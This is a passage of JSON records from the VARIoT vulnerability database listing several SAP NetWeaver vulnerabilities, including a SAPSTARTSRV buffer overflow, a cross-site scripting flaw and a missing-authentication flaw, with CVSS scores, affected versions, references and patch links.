"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-10311",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-10311",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-481",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238. SAP NetWeaver Contains a stack-based buffer overflow vulnerability. SAP NetWeaver is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. \nAttackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "BID",
"id": "91734"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-10311",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008363",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481",
"trust": 0.6
},
{
"db": "BID",
"id": "91734",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "91734"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"id": "VAR-201704-0066",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:34:18.430000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.sap.com/index.html"
},
{
"title": "SAP NetWeaver Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69175"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "NVD",
"id": "CVE-2016-10311"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10311"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10311"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2295238"
},
{
"trust": 0.3,
"url": "https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-july-2016/"
}
],
"sources": [
{
"db": "BID",
"id": "91734"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "91734"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-12T00:00:00",
"db": "BID",
"id": "91734"
},
{
"date": "2017-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"date": "2017-04-10T15:59:00.300000",
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"date": "2017-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:04:00",
"db": "BID",
"id": "91734"
},
{
"date": "2017-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-008363"
},
{
"date": "2018-12-10T19:29:14.797000",
"db": "NVD",
"id": "CVE-2016-10311"
},
{
"date": "2017-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerable to stack-based buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-008363"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-481"
}
],
"trust": 0.6
}
}
var-201705-4237
Vulnerability from variot
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-4237",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "98361"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "98361"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "98361"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "98361",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "98361"
}
]
},
"id": "VAR-201705-4237",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:08:58.020000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2424671"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/05/09/sap-security-patch-day-may-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "98361"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "98361"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-09T00:00:00",
"db": "BID",
"id": "98361"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "98361"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "98361"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Generic Object Services Unspecified Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "98361"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "98361"
}
],
"trust": 0.3
}
}
var-201803-1758
Vulnerability from variot
SAP NetWeaver System Landscape Directory, LM-CORE 7.10, 7.20, 7.30, 7.31, 7.40, does not perform any authentication checks for functionalities that require user identity. SAP NetWeaver System Landscape Directory Is vulnerable to a lack of authentication for critical functions.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver System Landscape Directory is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1758",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver system landscape directory",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver system landscape directory",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver system landscape directory",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver system landscape directory",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver system landscape directory",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "system landscape directory"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
}
],
"sources": [
{
"db": "BID",
"id": "103000"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_system_landscape_directory:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_system_landscape_directory:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_system_landscape_directory:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_system_landscape_directory:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_system_landscape_directory:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2368"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "103000"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2368",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2368",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-2368",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2368",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-033",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver System Landscape Directory, LM-CORE 7.10, 7.20, 7.30, 7.31, 7.40, does not perform any authentication checks for functionalities that require user identity. SAP NetWeaver System Landscape Directory Is vulnerable to a lack of authentication for critical functions.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver System Landscape Directory is prone to an authentication-bypass vulnerability. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "BID",
"id": "103000"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2368",
"trust": 2.7
},
{
"db": "BID",
"id": "103000",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002509",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "103000"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"id": "VAR-201803-1758",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:29:04.348000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "February 2018 (2565622)",
"trust": 0.8,
"url": "https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/"
},
{
"title": "SAP NetWeaver System Landscape Directory Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78828"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "NVD",
"id": "CVE-2018-2368"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2565622"
},
{
"trust": 1.9,
"url": "https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/103000"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2368"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2368"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "103000"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "103000"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-13T00:00:00",
"db": "BID",
"id": "103000"
},
{
"date": "2018-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"date": "2018-03-01T17:29:00.350000",
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"date": "2018-03-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-13T00:00:00",
"db": "BID",
"id": "103000"
},
{
"date": "2018-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002509"
},
{
"date": "2018-03-23T16:41:25.767000",
"db": "NVD",
"id": "CVE-2018-2368"
},
{
"date": "2018-03-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver System Landscape Directory Vulnerabilities related to lack of authentication for critical functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002509"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-033"
}
],
"trust": 0.6
}
}
var-201612-0676
Vulnerability from variot
SAP NetWeaver is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and gain unauthorized access to the SAP server filesystem.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
